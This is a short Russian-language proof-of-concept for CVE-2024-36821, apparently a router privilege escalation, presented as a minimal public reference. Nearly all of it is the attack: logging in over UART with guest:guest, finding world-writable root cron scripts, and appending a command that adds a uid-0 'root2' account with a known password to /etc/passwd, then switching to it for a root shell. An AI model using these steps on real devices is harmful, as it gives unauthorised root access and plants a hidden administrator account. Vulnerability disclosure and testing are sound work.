
Публичная ссылка, содержащая минимально необходимую информацию об уязвимости, охватываемой CVE-2024-36821.
Публичная ссылка, содержащая минимально необходимую информацию об уязвимости CVE-2024-36821
Подключитесь к маршрутизатору через UART-соединение
Используя учётные данные guest:guest, войдите в систему
Используя команду find / -perm -777 -type f 2>/dev/null, найдите файлы с правами на чтение, запись и выполнение:
1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
5. /tmp/cron/cron.everyminute/conntrack_collector.sh
Проверьте владельца командой ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh
Сгенерируйте пароль командой openssl passwd Abracadabra
Отредактируйте /tmp/cron/cron.everyminute/conntrack_collector.sh, добавив в конец новый сгенерированный пароль:
echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
Подождите минуту
Переключитесь на пользователя root2 следующей командой
/ $ su root2
Password: Abracadabra
~ #